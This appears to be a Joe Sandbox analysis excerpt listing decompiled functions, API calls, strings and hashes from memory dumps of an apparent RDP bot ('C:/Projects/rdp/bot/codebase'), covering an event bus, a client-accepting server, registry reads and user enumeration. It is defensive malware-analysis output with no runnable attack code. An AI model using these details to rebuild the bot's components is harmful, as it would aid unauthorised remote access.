[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE11EC2D05
~, xrefs: 00007FFE11EC2D66
, xrefs: 00007FFE11EC2D11
Done, xrefs: 00007FFE11EC2DEC
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE11EC2C2D
~, xrefs: 00007FFE11EC2C99

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 3142162b986c3d4fa4473a6ccf2dbf757ae8bb3ab3cb342be710ce241183fefe
Instruction ID: d9728a3af9dac54489042bd08d9d1b2114836b41f13e9fd40f6d84b1414159d0
Opcode Fuzzy Hash: 3142162b986c3d4fa4473a6ccf2dbf757ae8bb3ab3cb342be710ce241183fefe
Instruction Fuzzy Hash: 7051F824E0CF4382FB205BD6EC8437B2298AF14374FA452B6D93E462F1DE6DB9859345

Function 00007FFE0E16A7B8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E16A7D3
CreateThread.KERNEL32 ref: 00007FFE0E16A813
GetLastError.KERNEL32 ref: 00007FFE0E16A85B
GetLastError.KERNEL32 ref: 00007FFE0E16A933

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

Strings

[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE0E16A86D
~, xrefs: 00007FFE0E16A9A6
P, xrefs: 00007FFE0E16A8E2
~, xrefs: 00007FFE0E16A8D9
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E16A847
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE0E16A945
Done, xrefs: 00007FFE0E16AA2C
[I] (%s) -> %s, xrefs: 00007FFE0E16AA3A
ebus_init, xrefs: 00007FFE0E16A840, 00007FFE0E16A866, 00007FFE0E16A93E, 00007FFE0E16AA33
P, xrefs: 00007FFE0E16A9AB
, xrefs: 00007FFE0E16A879
, xrefs: 00007FFE0E16A951

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 62f3ef80df156b3033b80c8e012c7cc465b8e78bc4d37df674804b746f9539f6
Instruction ID: b058785e4b12121d9cd5ebdde00a9d45819e5c1b65890bb4b6d1c21dd13698db
Opcode Fuzzy Hash: 62f3ef80df156b3033b80c8e012c7cc465b8e78bc4d37df674804b746f9539f6
Instruction Fuzzy Hash: 39510720E0C70382FB705758A5D43B922A4AF04766F654337C9FE162F2DE6DA986D382

Function 00007FFE0EB417F8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EB41813
CreateThread.KERNEL32 ref: 00007FFE0EB41853
GetLastError.KERNEL32 ref: 00007FFE0EB4189B
GetLastError.KERNEL32 ref: 00007FFE0EB41973

Part of subcall function 00007FFE0EB49DC2: fwrite.MSVCRT ref: 00007FFE0EB49E6E
Part of subcall function 00007FFE0EB49DC2: fflush.MSVCRT ref: 00007FFE0EB49E7A

Strings

P, xrefs: 00007FFE0EB41922
P, xrefs: 00007FFE0EB419EB
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE0EB418AD
, xrefs: 00007FFE0EB418B9
, xrefs: 00007FFE0EB41991
~, xrefs: 00007FFE0EB41919
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB41887
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE0EB41985
ebus_init, xrefs: 00007FFE0EB41880, 00007FFE0EB418A6, 00007FFE0EB4197E, 00007FFE0EB41A73
Done, xrefs: 00007FFE0EB41A6C
[I] (%s) -> %s, xrefs: 00007FFE0EB41A7A
~, xrefs: 00007FFE0EB419E6

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 4e7cc123c9a819827e20a483d8cb600ba998d4310189115dfd21db2416d51342
Instruction ID: e0b7593fa49ea36a448045ee3f1e9fdd9d9c63ee185a46e01c6503d464804c50
Opcode Fuzzy Hash: 4e7cc123c9a819827e20a483d8cb600ba998d4310189115dfd21db2416d51342
Instruction Fuzzy Hash: 825106A1E0E70382FB316F18A8843792291EF093A4F244736C5FE062F5DE6DA9C58E55

Function 00007FF6EF653452 Relevance: 27.2, APIs: 7, Strings: 11, Instructions: 241memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EF668500,00000000,00000000), ref: 00007FF6EF65349D
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EF668500,00000000,00000000), ref: 00007FF6EF6534AE

Part of subcall function 00007FF6EF654FC5: fopen.MSVCRT ref: 00007FF6EF65500A
Part of subcall function 00007FF6EF654FC5: fseek.MSVCRT ref: 00007FF6EF655029
Part of subcall function 00007FF6EF654FC5: _errno.MSVCRT ref: 00007FF6EF65503D
Part of subcall function 00007FF6EF654FC5: _errno.MSVCRT ref: 00007FF6EF655058

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EF668500,00000000,00000000), ref: 00007FF6EF6535DA
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EF668500,00000000,00000000), ref: 00007FF6EF6535EB
strncpy.MSVCRT ref: 00007FF6EF65372C
strncpy.MSVCRT ref: 00007FF6EF653743
strncpy.MSVCRT ref: 00007FF6EF6537A2

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

Strings

(path != NULL), xrefs: 00007FF6EF653514
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF6EF65350D
service, xrefs: 00007FF6EF65345D
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF6534E6
mem_alloc, xrefs: 00007FF6EF653633
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6EF653522
NULL, xrefs: 00007FF6EF6537F2
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF6EF65363A
[I] (%s) -> Done(path=%s), xrefs: 00007FF6EF653808
5, xrefs: 00007FF6EF653505
ini_load, xrefs: 00007FF6EF6534DF, 00007FF6EF65351B, 00007FF6EF653801

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
API String ID: 1423203057-455140666
Opcode ID: ed353ceca3dbb001e75364d94296b3dd79ad6c528b8496316adeca29f8f96bff
Instruction ID: 6a3f409d6d52d21fcf6f514a346f4e84858edf1ad0c85911b19234f021fcc43f
Opcode Fuzzy Hash: ed353ceca3dbb001e75364d94296b3dd79ad6c528b8496316adeca29f8f96bff
Instruction Fuzzy Hash: A4A102A3B0D68293FE108B01E4023B9675AAB44F84F454835EE4DD77A6DE3EE545E30A

Function 00007FF6EF659242 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF6EF65929C
RegQueryValueExA.KERNEL32 ref: 00007FF6EF6593E4

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

Strings

C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF6EF659302, 00007FF6EF659335, 00007FF6EF659368, 00007FF6EF65939B
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF6EF65955D
(root != NULL), xrefs: 00007FF6EF659309
(key != NULL), xrefs: 00007FF6EF65933C
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF6EF6596DB
(value != NULL), xrefs: 00007FF6EF65936F
(value_sz != NULL), xrefs: 00007FF6EF6593A2
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF6EF6592BE
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FF6EF659412
NULL, xrefs: 00007FF6EF65943E, 00007FF6EF6596EC, 00007FF6EF6596F8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6EF659317, 00007FF6EF65934A, 00007FF6EF65937D, 00007FF6EF6593B0
registry_get_value, xrefs: 00007FF6EF6592B7, 00007FF6EF659310, 00007FF6EF659343, 00007FF6EF659376, 00007FF6EF6593A9, 00007FF6EF65940B, 00007FF6EF659556, 00007FF6EF6596D4

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-910542497
Opcode ID: 7c37e71a4c9cbcdd55fd5de521ab0ff515261aaf5fd0eb76ebcbccddd1d4032b
Instruction ID: 10e75f1bdd9d01414e146f04d8e055ce12309d3f6770e846837268a77cd88ff0
Opcode Fuzzy Hash: 7c37e71a4c9cbcdd55fd5de521ab0ff515261aaf5fd0eb76ebcbccddd1d4032b
Instruction Fuzzy Hash: 28A11F62E1C70783FA209B40A4413B9235CAF01748F540536DA5EE67A2FE6FE995F34B

Function 00007FFE13383553 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 134memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE1338363E
HeapAlloc.KERNEL32 ref: 00007FFE13383652
CreateThread.KERNEL32 ref: 00007FFE13383694
EnterCriticalSection.KERNEL32 ref: 00007FFE133836AA
LeaveCriticalSection.KERNEL32 ref: 00007FFE133836D1
GetLastError.KERNEL32 ref: 00007FFE13383721
GetProcessHeap.KERNEL32 ref: 00007FFE13383752
HeapFree.KERNEL32 ref: 00007FFE13383763

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE13383700
mem_alloc, xrefs: 00007FFE133836F9
[I] (%s) -> Server ready(ssock=0x%llx), xrefs: 00007FFE13383585
[E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu), xrefs: 00007FFE13383735
routine_accept, xrefs: 00007FFE1338357E, 00007FFE133836DB, 00007FFE1338372E
[I] (%s) -> Client accepted(client=0x%llx), xrefs: 00007FFE133836E2

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Heap$CriticalProcessSection$AllocCreateEnterErrorFreeLastLeaveThread
String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
API String ID: 871770459-375624272
Opcode ID: 40f04a75b51a2e9e2ef9d3246091da1038eb2d015d0143044c07b84bd8fa9eae
Instruction ID: a3980a4562081ac17fe3bbbe93c7de528474342a2e74807ea60c5f72728995ac
Opcode Fuzzy Hash: 40f04a75b51a2e9e2ef9d3246091da1038eb2d015d0143044c07b84bd8fa9eae
Instruction Fuzzy Hash: 82515064A09E0389FA549B17E81037D2251AF60BB4F5403F1E83E67BF1EE7DE4868748

Function 00007FFE0E13715F Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E136DD8
wcsncpy.MSVCRT ref: 00007FFE0E136E06
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E136E63
GetLastError.KERNEL32 ref: 00007FFE0E136E75
wcslen.MSVCRT ref: 00007FFE0E1371F7
GetProcessHeap.KERNEL32 ref: 00007FFE0E137207
HeapAlloc.KERNEL32 ref: 00007FFE0E137218
GetProcessHeap.KERNEL32 ref: 00007FFE0E137234
HeapAlloc.KERNEL32 ref: 00007FFE0E137245
NetApiBufferFree.NETAPI32 ref: 00007FFE0E137283
NetUserEnum.NETAPI32 ref: 00007FFE0E1372F9
GetProcessHeap.KERNEL32 ref: 00007FFE0E137337
HeapAlloc.KERNEL32 ref: 00007FFE0E137348
memcpy.MSVCRT ref: 00007FFE0E137385
GetProcessHeap.KERNEL32 ref: 00007FFE0E13738A
HeapFree.KERNEL32 ref: 00007FFE0E13739B

Strings

mem_alloc, xrefs: 00007FFE0E13725B
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E137262
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E136E87
D, xrefs: 00007FFE0E136DF5
users_sync, xrefs: 00007FFE0E136E80

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: d9f4b9ce3a928d9979f129f9ae62a71057fc18060ba1282713374b8aa13e1647
Instruction ID: c5aced74871534d5eb0c1844f400feed744b6f2b0b7c5e82c87440f737113b9d
Opcode Fuzzy Hash: d9f4b9ce3a928d9979f129f9ae62a71057fc18060ba1282713374b8aa13e1647
Instruction Fuzzy Hash: 90513FB6A08B4296EB50CF64E44436A77A1FB89B88F444137DACD437A8EF7CE945C700

Function 00007FFE0E137174 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E136DD8
wcsncpy.MSVCRT ref: 00007FFE0E136E06
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E136E63
GetLastError.KERNEL32 ref: 00007FFE0E136E75
wcslen.MSVCRT ref: 00007FFE0E1371F7
GetProcessHeap.KERNEL32 ref: 00007FFE0E137207
HeapAlloc.KERNEL32 ref: 00007FFE0E137218
GetProcessHeap.KERNEL32 ref: 00007FFE0E137234
HeapAlloc.KERNEL32 ref: 00007FFE0E137245
NetApiBufferFree.NETAPI32 ref: 00007FFE0E137283
NetUserEnum.NETAPI32 ref: 00007FFE0E1372F9
GetProcessHeap.KERNEL32 ref: 00007FFE0E137337
HeapAlloc.KERNEL32 ref: 00007FFE0E137348
memcpy.MSVCRT ref: 00007FFE0E137385
GetProcessHeap.KERNEL32 ref: 00007FFE0E13738A
HeapFree.KERNEL32 ref: 00007FFE0E13739B

Strings

mem_alloc, xrefs: 00007FFE0E13725B
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E137262
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E136E87
D, xrefs: 00007FFE0E136DF5
users_sync, xrefs: 00007FFE0E136E80

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: 5f722c4a9db5caff0a9512cade735875657457e76d6ab67cd837017c8794a22c
Instruction ID: 6d2ad870a2054a6735b16fcb730216d56c38b52ba2adb46a11c61f887e4d4f3a
Opcode Fuzzy Hash: 5f722c4a9db5caff0a9512cade735875657457e76d6ab67cd837017c8794a22c
Instruction Fuzzy Hash: 005130B6A08B4296EB50CF24E44436977A1FB89B48F444137DACD437A8DF7CE945C700

Function 00007FFE0E137151 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E136DD8
wcsncpy.MSVCRT ref: 00007FFE0E136E06
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E136E63
GetLastError.KERNEL32 ref: 00007FFE0E136E75
wcslen.MSVCRT ref: 00007FFE0E1371F7
GetProcessHeap.KERNEL32 ref: 00007FFE0E137207
HeapAlloc.KERNEL32 ref: 00007FFE0E137218
GetProcessHeap.KERNEL32 ref: 00007FFE0E137234
HeapAlloc.KERNEL32 ref: 00007FFE0E137245
NetApiBufferFree.NETAPI32 ref: 00007FFE0E137283
NetUserEnum.NETAPI32 ref: 00007FFE0E1372F9
GetProcessHeap.KERNEL32 ref: 00007FFE0E137337
HeapAlloc.KERNEL32 ref: 00007FFE0E137348
memcpy.MSVCRT ref: 00007FFE0E137385
GetProcessHeap.KERNEL32 ref: 00007FFE0E13738A
HeapFree.KERNEL32 ref: 00007FFE0E13739B

Strings

mem_alloc, xrefs: 00007FFE0E13725B
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E137262
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E136E87
D, xrefs: 00007FFE0E136DF5
users_sync, xrefs: 00007FFE0E136E80

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: 680665ad80dbd839f89f1888cd9b1286b57fa87c8533a93014bac34192691f53
Instruction ID: 0d0e8ace6d916a5f75132f68f8ea2ba1c0d8bc77323ae6645fbffe8a7d850492
Opcode Fuzzy Hash: 680665ad80dbd839f89f1888cd9b1286b57fa87c8533a93014bac34192691f53
Instruction Fuzzy Hash: 55513FB6A08B4296EB50CF24E44436A77A1FB89B88F444137DACD437A8EF7CE945C700

Function 00007FFE0E137158 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E136DD8
wcsncpy.MSVCRT ref: 00007FFE0E136E06
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E136E63
GetLastError.KERNEL32 ref: 00007FFE0E136E75
wcslen.MSVCRT ref: 00007FFE0E1371F7
GetProcessHeap.KERNEL32 ref: 00007FFE0E137207
HeapAlloc.KERNEL32 ref: 00007FFE0E137218
GetProcessHeap.KERNEL32 ref: 00007FFE0E137234
HeapAlloc.KERNEL32 ref: 00007FFE0E137245
NetApiBufferFree.NETAPI32 ref: 00007FFE0E137283
NetUserEnum.NETAPI32 ref: 00007FFE0E1372F9
GetProcessHeap.KERNEL32 ref: 00007FFE0E137337
HeapAlloc.KERNEL32 ref: 00007FFE0E137348
memcpy.MSVCRT ref: 00007FFE0E137385
GetProcessHeap.KERNEL32 ref: 00007FFE0E13738A
HeapFree.KERNEL32 ref: 00007FFE0E13739B

Strings

mem_alloc, xrefs: 00007FFE0E13725B
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E137262
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E136E87
D, xrefs: 00007FFE0E136DF5
users_sync, xrefs: 00007FFE0E136E80

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: 7f02770f6dceb336f674d9739dcb427619bedb638fdf82b87115723d2eee471c
Instruction ID: cdbb8d64e08329f0f2923e01f73396efe81ab4e793a25816cd1e7eda32656b94
Opcode Fuzzy Hash: 7f02770f6dceb336f674d9739dcb427619bedb638fdf82b87115723d2eee471c
Instruction Fuzzy Hash: 7C513FB6A08B4296EB50CF24E44436A77A1FB89B88F444137DACD437A8EF7CE945C700

Function 00007FFE0E168B63 Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 94COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E168B74
